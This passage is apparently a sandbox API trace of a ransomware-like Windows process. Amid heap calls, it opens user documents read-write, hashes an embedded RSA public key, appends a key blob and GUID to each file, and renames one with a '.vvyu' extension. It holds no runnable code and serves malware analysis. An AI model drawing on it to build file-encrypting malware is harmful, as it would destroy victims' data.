1 [0197.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0197.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea728 | out: hHeap=0x2c0000) returned 1 [0197.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.311] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x1432c, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1432c, lpOverlapped=0x0) returned 1 [0197.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.312] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14331, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.312] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.314] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.314] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.314] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.314] CloseHandle (hObject=0x584) returned 1 [0197.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0197.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0197.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0197.317] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\io6KkQYuC.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\io6kkqyuc.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\io6KkQYuC.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\io6kkqyuc.xlsx.vvyu")) returned 1 [0197.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.320] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0197.323] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b94cb30, ftCreationTime.dwHighDateTime=0x1d8a495, ftLastAccessTime.dwLowDateTime=0x85b20620, ftLastAccessTime.dwHighDateTime=0x1d8a590, ftLastWriteTime.dwLowDateTime=0x85b20620, ftLastWriteTime.dwHighDateTime=0x1d8a590, nFileSizeHigh=0x0, nFileSizeLow=0xa412, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sJ8rZqt9cv0j.doc", cAlternateFileName="SJ8RZQ~1.DOC")) returned 1 [0197.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0197.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.324] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\sJ8rZqt9cv0j.doc") returned=".doc" [0197.324] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\sJ8rZqt9cv0j.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\sj8rzqt9cv0j.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.324] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=42002) returned 1 [0197.324] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.328] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa3ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.328] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.331] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.331] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xa412, lpOverlapped=0x0) returned 1 [0197.332] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.332] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.332] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.332] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0197.333] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.333] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.333] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.333] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.333] GetLastError () returned 0x0 [0197.334] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.334] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0197.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.334] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.334] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.334] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa410) returned 0x2af5168 [0197.335] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea728 [0197.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6740 [0197.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea770 [0197.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6758 [0197.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6788 [0197.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67e8 [0197.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67a0 [0197.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.336] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67e8 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67a0 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6788 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0197.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.339] GetCurrentThreadId () returned 0x5d8 [0197.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2810 [0197.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0197.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.340] GetCurrentThreadId () returned 0x5d8 [0197.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67e8 [0197.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6788 [0197.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0197.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67a0 [0197.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.342] RtlAllocateHeap 